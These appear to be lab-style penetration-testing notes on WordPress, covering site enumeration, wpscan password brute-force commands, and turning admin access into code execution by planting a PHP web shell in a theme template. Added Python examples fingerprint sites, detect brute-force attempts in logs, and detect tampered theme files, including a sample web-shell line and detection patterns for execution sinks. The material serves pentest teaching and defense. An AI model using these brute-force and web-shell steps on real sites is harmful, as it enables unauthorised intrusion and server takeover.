# Wordpress

## **Discovery & Enumeration**

Note: We can use the [waybackurls](https://github.com/tomnomnom/waybackurls) tool to look for older versions of a target site using the Wayback Machine. Sometimes we may find a previous version of a WordPress site using a plugin that has a known vulnerability. If the plugin is no longer in use but the developers did not remove it properly, we may still be able to access the directory it is stored in and exploit a flaw.

**Tools**

<https://github.com/wpscanteam/wpscan>

Signs that WordPress is installed can be found in `/robots.txt`:

```bash
User-agent: *
Disallow: /wp-admin/
Allow: /wp-admin/admin-ajax.php
Disallow: /wp-content/uploads/wpforms/

Sitemap: https://inlanefreight.local/wp-sitemap.xml
```

The presence of the `/wp-admin` and `/wp-content` directories would be a dead giveaway that we are dealing with WordPress.

* WordPress stores its plugins in the `wp-content/plugins` directory.
* Themes are stored in the `wp-content/themes` directory.

**There are five types of users on a standard WordPress installation.**

1. Administrator: This user has access to administrative features within the website. This includes adding and deleting users and posts, as well as editing source code.
2. Editor: An editor can publish and manage posts, including the posts of other users.
3. Author: They can publish and manage their own posts.
4. Contributor: These users can write and manage their own posts but cannot publish them.
5. Subscriber: These are standard users who can browse posts and edit their profiles.

Getting access to an administrator is usually sufficient to obtain code execution on the server. Editors and authors might have access to certain vulnerable plugins, which normal users don’t.

**Footprint enumeration**

```bash
# Quick way to identify a WordPress site
Intrusionz3r0@htb[/htb]$ curl -s http://blog.inlanefreight.local | grep WordPress
# Quick way to identify the theme in use
Intrusionz3r0@htb[/htb]$ curl -s http://blog.inlanefreight.local/ | grep themes
# Quick way to identify installed plugins
Intrusionz3r0@htb[/htb]$ curl -s 'http://blog.inlanefreight.local' | grep plugins | grep -oP "http://[^\s']+"
Intrusionz3r0@htb[/htb]$ curl -s http://blog.inlanefreight.local/?p=1 | grep plugins
```
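As an added example (not code from the original notes or from wpscan), the following Python script does what the `/robots.txt` check above and these `curl | grep` one-liners do by hand: it pulls the WordPress-only paths out of a robots.txt body and extracts the version, theme and plugin slugs (with their `?ver=` asset versions) from page HTML. The robots.txt and HTML bodies are constructed samples, the theme and plugin names in them are made up, and the function names are this example's own; in practice you would feed it the bodies fetched with `curl`.

```python
"""Fingerprint a WordPress install from robots.txt and a page's HTML.

Added example, not code from the original notes: the robots.txt and HTML
bodies below are constructed samples standing in for what `curl` returns,
and the theme/plugin names in them are made up. Function names are this
example's own.
"""
import re

# Constructed robots.txt, modelled on the one quoted in the notes.
SAMPLE_ROBOTS = """User-agent: *
Disallow: /wp-admin/
Allow: /wp-admin/admin-ajax.php
Disallow: /wp-content/uploads/wpforms/

Sitemap: https://inlanefreight.local/wp-sitemap.xml
"""

# Constructed HTML head with the generator tag and the theme/plugin asset
# URLs that the curl | grep one-liners pick out.
SAMPLE_HTML = """<html><head>
<meta name="generator" content="WordPress 5.8" />
<link rel="stylesheet" href="http://blog.inlanefreight.local/wp-content/themes/example-theme/style.css?ver=1.0" />
<script src="http://blog.inlanefreight.local/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.4.2"></script>
<script src="http://blog.inlanefreight.local/wp-content/plugins/example-gallery/js/gallery.js?ver=2.3.1"></script>
</head><body></body></html>
"""

# Paths that only a WordPress install serves
WP_MARKERS = ("/wp-admin", "/wp-content", "/wp-includes",
              "wp-login.php", "xmlrpc.php", "wp-sitemap")


def robots_wordpress_hints(robots_txt: str) -> list:
    """Return the WordPress-specific directive values found in a robots.txt body."""
    hints = []
    for line in robots_txt.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        # Directives look like "Disallow: /wp-admin/" or "Sitemap: <url>";
        # split on the first colon only so URLs keep their scheme.
        _, _, value = line.partition(":")
        value = value.strip()
        if any(marker in value for marker in WP_MARKERS):
            hints.append(value)
    return hints


def fingerprint_html(html: str) -> dict:
    """Extract the WordPress version, theme slugs and plugin slugs (+ asset versions)."""
    result = {"is_wordpress": False, "version": None, "themes": set(), "plugins": {}}

    # <meta name="generator" content="WordPress 5.8"> is the most direct marker
    m = re.search(r'<meta\s+name="generator"\s+content="WordPress\s*([\d.]*)"', html, re.I)
    if m:
        result["is_wordpress"] = True
        result["version"] = m.group(1) or None

    # Theme slug is the directory right after /wp-content/themes/
    for theme in re.findall(r"/wp-content/themes/([^/'\"?]+)/", html):
        result["is_wordpress"] = True
        result["themes"].add(theme)

    # Plugin slug plus the ?ver= query string, which usually mirrors the plugin version
    for slug, ver in re.findall(r"/wp-content/plugins/([^/'\"?]+)/[^'\"\s]*?\?ver=([\w.]+)", html):
        result["is_wordpress"] = True
        result["plugins"].setdefault(slug, ver)

    return result


if __name__ == "__main__":
    print("robots.txt hints:", robots_wordpress_hints(SAMPLE_ROBOTS))
    print("HTML fingerprint:", fingerprint_html(SAMPLE_HTML))
```

The `?ver=` value is only a hint: a site can rewrite or strip asset versions, so treat it as a starting point for wpscan's plugin enumeration rather than a confirmed version.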

**Password attacks against enumerated users**

{% hint style="info" %}
Try the different password attack methods (`wp-login` and `xmlrpc`).
{% endhint %}

```bash
Intrusionz3r0@htb[/htb]$ sudo wpscan --password-attack wp-login -U <user> -P pass.txt --url http://10.10.110.100/wordpress
Intrusionz3r0@htb[/htb]$ sudo wpscan --password-attack xmlrpc -t 20 -U john -P /usr/share/wordlists/rockyou.txt --url http://blog.inlanefreight.local
```
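The attacks above leave a distinctive trace on the target: bursts of POSTs to `wp-login.php` or `xmlrpc.php` from one client, often with wpscan's default User-Agent. As an added example (not part of the original notes), this Python script detects that pattern in Apache combined-format access logs with a sliding one-minute window per source IP and endpoint. The log lines are constructed samples (the scanner User-Agent string is modelled on wpscan's default), and the thresholds and function names are this example's own choices.

```python
"""Flag password guessing against wp-login.php and xmlrpc.php in access logs.

Added example, not part of the original notes. The log lines are constructed
samples in Apache combined format; the thresholds, window size and function
names are this example's own choices.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# POSTs per source IP to one endpoint within WINDOW that trigger a finding.
# xmlrpc.php gets a lower bar because system.multicall packs many guesses
# into a single request, so the request count understates the attempts.
THRESHOLDS = {"/wp-login.php": 10, "/xmlrpc.php": 5}
WINDOW = timedelta(seconds=60)
# Constructed, modelled on wpscan's default User-Agent
SCANNER_UA = "WPScan v3.8.22 (https://wpscan.com/wordpress-security-scanner)"


def _line(ip, second, method, path, ua="Mozilla/5.0"):
    """Build one constructed combined-format log line at 10:MM:SS UTC."""
    ts = f"12/Mar/2023:10:{second // 60:02d}:{second % 60:02d} +0000"
    return f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" 200 1024 "-" "{ua}"'


# Constructed sample: a wp-login burst, an xmlrpc burst, and a normal visitor
# who logs in once.
SAMPLE_LOG = (
    [_line("10.10.14.5", s, "POST", "/wp-login.php", SCANNER_UA) for s in range(1, 13)]
    + [_line("10.10.14.9", 300 + s, "POST", "/xmlrpc.php") for s in range(6)]
    + [
        _line("192.168.1.20", 40, "GET", "/"),
        _line("192.168.1.20", 45, "POST", "/wp-login.php"),
        _line("192.168.1.20", 50, "GET", "/wp-admin/"),
    ]
)


def parse(lines):
    """Parse combined-format lines into event dicts; unparsable lines are skipped."""
    events = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        events.append({
            "ip": m["ip"],
            "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
            "method": m["method"],
            "path": m["path"].split("?", 1)[0],   # drop any query string
            "ua": m["ua"],
        })
    return events


def detect_password_attacks(lines):
    """Return one finding per (ip, endpoint) whose POST rate reaches its threshold."""
    events = parse(lines)
    scanner_ips = {e["ip"] for e in events if "wpscan" in e["ua"].lower()}
    by_key = defaultdict(list)
    for e in events:
        if e["method"] == "POST" and e["path"] in THRESHOLDS:
            by_key[(e["ip"], e["path"])].append(e["ts"])

    findings = []
    for (ip, path), times in by_key.items():
        times.sort()
        best, j = 0, 0
        for i in range(len(times)):           # sliding window: max POSTs in any 60 s
            while j < len(times) and times[j] - times[i] <= WINDOW:
                j += 1
            best = max(best, j - i)
        if best >= THRESHOLDS[path]:
            findings.append({"ip": ip, "path": path, "max_per_minute": best,
                             "scanner_ua": ip in scanner_ips})
    return findings


if __name__ == "__main__":
    for finding in detect_password_attacks(SAMPLE_LOG):
        print(finding)
```

The User-Agent check is a bonus signal only; `wpscan` accepts a custom agent, so the rate-based rule is what actually catches the attack.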

Automated enumeration with wpscan

```bash
Intrusionz3r0@htb[/htb]$ sudo wpscan --url http://blog.inlanefreight.local --enumerate --api-token dEOFB<SNIP>
```

## **Panel RCE**

**Modifying a PHP file of the active theme (admin credentials needed)**

Appearance → Theme Editor → 404 Template or footer (at the right)

**Replace the file content with a PHP web shell:**


```
http://example.com/wp-content/themes/<name>/footer.php?cmd=id
```
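Because this technique edits a file on disk, it is also easy to catch on the defender's side. As an added example, not from the original notes, the Python script below records a SHA-256 baseline of a theme directory, reports files that were modified or added afterwards, and scans the changed PHP files for request-controlled data reaching a code- or command-execution sink. It builds a throwaway theme in a temporary directory with constructed files (the theme name and file contents are made up) so that it runs offline; the function names are this example's own.

```python
"""Detect tampering of theme files such as footer.php and 404.php.

Added example, not from the original notes: it builds a throwaway theme
directory with constructed files, records a hash baseline, then reports files
that changed or contain code-execution sinks fed by request parameters.
Function names and signatures are this example's own.
"""
import hashlib
import re
import tempfile
from pathlib import Path

# Request-controlled data reaching an execution sink is the signature of the
# edited-template shell described above; the second pattern catches the
# common obfuscated variant.
SUSPICIOUS = [
    re.compile(r"\b(?:system|exec|shell_exec|passthru|popen|proc_open|eval|assert)"
               r"\s*\([^;]*\$_(?:GET|POST|REQUEST|COOKIE)\b", re.I),
    re.compile(r"\beval\s*\(\s*(?:base64_decode|gzinflate|str_rot13)\s*\(", re.I),
]


def sha256_of(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()


def baseline(theme_dir: Path) -> dict:
    """Map each file's path (relative to the theme root) to its SHA-256."""
    return {str(p.relative_to(theme_dir)): sha256_of(p)
            for p in sorted(theme_dir.rglob("*")) if p.is_file()}


def find_suspicious_php(path: Path) -> list:
    """Return the matched snippets for every sink pattern found in a PHP file."""
    text = path.read_text(errors="replace")
    hits = []
    for pattern in SUSPICIOUS:
        m = pattern.search(text)
        if m:
            hits.append(m.group(0))
    return hits


def audit(theme_dir: Path, expected: dict) -> dict:
    """Compare the live theme against a baseline and inspect what changed."""
    current = baseline(theme_dir)
    report = {"modified": [], "added": [], "removed": [], "suspicious": {}}
    for rel, digest in current.items():
        if rel not in expected:
            report["added"].append(rel)
        elif expected[rel] != digest:
            report["modified"].append(rel)
    report["removed"] = [rel for rel in expected if rel not in current]
    # Only changed or new PHP files need content inspection
    for rel in report["modified"] + report["added"]:
        if rel.endswith(".php"):
            hits = find_suspicious_php(theme_dir / rel)
            if hits:
                report["suspicious"][rel] = hits
    return report


def demo() -> dict:
    """Build a constructed theme, baseline it, tamper with it, and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        theme = Path(tmp) / "example-theme"
        theme.mkdir()
        (theme / "footer.php").write_text("<?php wp_footer(); ?>\n</body></html>\n")
        (theme / "404.php").write_text("<?php get_header(); ?><h1>Not found</h1><?php get_footer(); ?>\n")
        (theme / "style.css").write_text("/*\nTheme Name: Example\n*/\n")
        expected = baseline(theme)

        # Constructed tampering: the edited footer the notes describe, plus a
        # dropped file using the obfuscated variant.
        (theme / "footer.php").write_text(
            "<?php system($_GET['cmd']); wp_footer(); ?>\n</body></html>\n")
        (theme / "cache.php").write_text("<?php eval(base64_decode('PLACEHOLDER')); ?>\n")
        return audit(theme, expected)


if __name__ == "__main__":
    print(demo())
```

In a real deployment the baseline would come from a clean copy of the theme (or the package's published checksums) rather than from the live directory. Administrators can also remove the editor entirely by adding `define('DISALLOW_FILE_EDIT', true);` to `wp-config.php`, which hides the Theme Editor that the steps above rely on.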
